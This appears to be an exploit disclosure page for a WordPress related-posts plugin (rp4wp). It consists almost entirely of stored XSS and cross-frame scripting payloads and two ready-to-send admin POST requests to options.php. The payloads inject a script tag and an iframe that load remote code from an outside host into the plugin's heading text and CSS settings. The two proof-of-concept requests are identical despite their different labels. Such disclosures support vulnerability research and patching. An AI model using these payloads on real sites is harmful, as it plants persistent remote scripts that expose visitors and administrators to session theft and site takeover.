## https://sploitus.com/exploit?id=WPEX-ID:2F86E418-22FD-4CB8-8DE1-062B17CF20A7
### -- [ Payloads: ]

[$] m0ze"><script src=//m0ze.ru/payload/a.js></script><div x

[$] m0ze</textarea><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x



### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Heading text: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | CSS: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x